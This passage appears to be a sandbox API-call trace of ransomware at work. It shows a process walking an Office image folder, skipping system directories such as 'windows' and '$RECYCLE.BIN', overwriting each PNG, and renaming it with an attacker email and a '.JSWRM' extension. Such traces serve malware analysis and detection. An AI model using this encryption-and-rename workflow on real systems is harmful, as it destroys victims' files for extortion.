lpWideCharStr="WinProjLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x2412e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.106] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2192) returned 1 [0134.106] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.106] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0134.108] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.108] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0134.108] CloseHandle (hObject=0x238) returned 1 [0134.108] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.109] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x759, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-black_scale-100.png", cAlternateFileName="WI30FF~1.PNG")) returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0134.109] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.110] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0134.110] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.111] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1881) returned 1 [0134.111] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.111] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x750, lpOverlapped=0x0) returned 1 [0134.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.112] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x750, lpOverlapped=0x0) returned 1 [0134.112] CloseHandle (hObject=0x238) returned 1 [0134.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.114] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-black_scale-140.png", cAlternateFileName="WINPRO~4.PNG")) returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0134.114] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.115] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2112) returned 1 [0134.115] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.115] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x840, lpOverlapped=0x0) returned 1 [0134.117] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.117] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x840, lpOverlapped=0x0) returned 1 [0134.117] CloseHandle (hObject=0x238) returned 1 [0134.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.118] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xacd, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-black_scale-180.png", cAlternateFileName="WIE311~1.PNG")) returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0134.118] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.119] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2765) returned 1 [0134.119] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.119] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0134.121] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.121] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0134.121] CloseHandle (hObject=0x238) returned 1 [0134.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.122] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x610, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-black_scale-80.png", cAlternateFileName="WIC0C5~1.PNG")) returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0134.122] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.123] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1552) returned 1 [0134.123] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.124] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x610, lpOverlapped=0x0) returned 1 [0134.125] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.125] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x610, lpOverlapped=0x0) returned 1 [0134.125] CloseHandle (hObject=0x238) returned 1 [0134.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.126] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x764, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-white_scale-100.png", cAlternateFileName="WIB14C~1.PNG")) returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0134.126] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0134.126] lstrcmpiW 